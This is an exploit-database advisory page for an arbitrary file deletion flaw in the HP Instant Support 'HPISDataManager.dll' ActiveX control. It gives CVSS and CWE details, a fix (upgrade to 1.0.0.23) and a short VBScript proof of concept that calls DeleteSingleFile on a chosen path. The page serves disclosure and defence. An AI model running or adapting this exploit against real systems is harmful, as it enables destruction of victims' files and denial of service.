header-logo
Suggest Exploit
vendor:
HP Instant Support
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary File Deletion
284
CWE
Product Name: HP Instant Support
Affected Version From: 1.0.0.22
Affected Version To: 1.0.0.22
Patch Exists: YES
Related CWE: N/A
CPE: a:hewlett_packard:hp_instant_support
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

HP Instant Support ‘HPISDataManager.dll’ ActiveX control Arbitrary File Deletion Vulnerability

HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a vulnerability that lets attackers delete arbitrary files on the affected computer in the context of the application using the ActiveX control. Successful attacks can result in denial-of-service conditions. An attacker can exploit this issue by enticing an unsuspecting user to view a malicious web page.

Mitigation:

Upgrade to HP Instant Support 1.0.0.23 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/29536/info

HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a vulnerability that lets attackers delete arbitrary files on the affected computer in the context of the application using the ActiveX control. Successful attacks can result in denial-of-service conditions.

HP Instant Support 1.0.0.22 and earlier versions are affected.

NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.

<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Sub DeleteSingleFile ( ByVal pszFileName As String )" memberName = "DeleteSingleFile" progid = "HPISDataManagerLib.Datamgr" argCount = 1 arg1="c:\evil.exe" target.DeleteSingleFile arg1 </script></job></package>